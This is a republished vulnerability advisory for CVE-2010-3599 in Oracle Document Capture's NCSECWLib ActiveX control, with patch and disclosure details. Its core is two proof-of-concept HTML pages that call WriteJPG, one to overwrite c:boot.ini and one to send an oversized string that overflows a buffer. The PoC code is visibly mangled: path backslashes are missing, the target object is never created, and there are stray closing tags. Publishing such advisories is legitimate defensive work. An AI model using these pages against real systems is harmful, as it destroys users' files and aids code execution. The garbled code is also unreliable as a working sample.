‘Oracle Document Capture ActiveX Insecure method and Buffer Overflow Vulnerabilities’

Summary

Multiple vulnerabilities were identified in Oracle Document Capture.’

Credit:

‘The information has been provided by Alexandr Polyakov.
The original article can be found at: http://seclists.org/bugtraq/2011/Jan/151


Details

Vulnerable Systems:
 * Oracle Document Capture 10.1.3.5

An Insecure method was found in NCSECWLib ActiveX control component which is a part of Oracle Document Capture. One of the methods (WriteJPG) can be used to overwrite files on users system and is also affected by buffer overflow vulnerabilities. An Attacker can construct an html page that calls the vulnerable function ‘WriteJPG’ from ActiveX Object NCSECWLib:

Example 1
*******

<html>
<script>
targetFile = ‘C:Program FilesOracleDocument CaptureNCSEcw.dll’
prototype = ‘Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )’
memberName = ‘WriteJPG’
progid = ‘NCSECWLib.NCSRenderer’
argCount = 3

arg1=’c:boot.ini’
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3

</script>
</html>

Example 2
*******

<html>
<script>
targetFile = ‘C:Program FilesOracleDocument CaptureNCSEcw.dll’
prototype = ‘Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )’
memberName = ‘WriteJPG’
progid = ‘NCSECWLib.NCSRenderer’
argCount = 3

arg1=String(13332, ‘A’)
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3

</script></job></package>

Patch Availability:
All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

CVE Information:
CVE-2010-3599

Disclosure Timeline:
14.12.2009 Reported
15.12.2009 Vendor response
24.01.2011 Date of Public Advisory’

Categories: Windows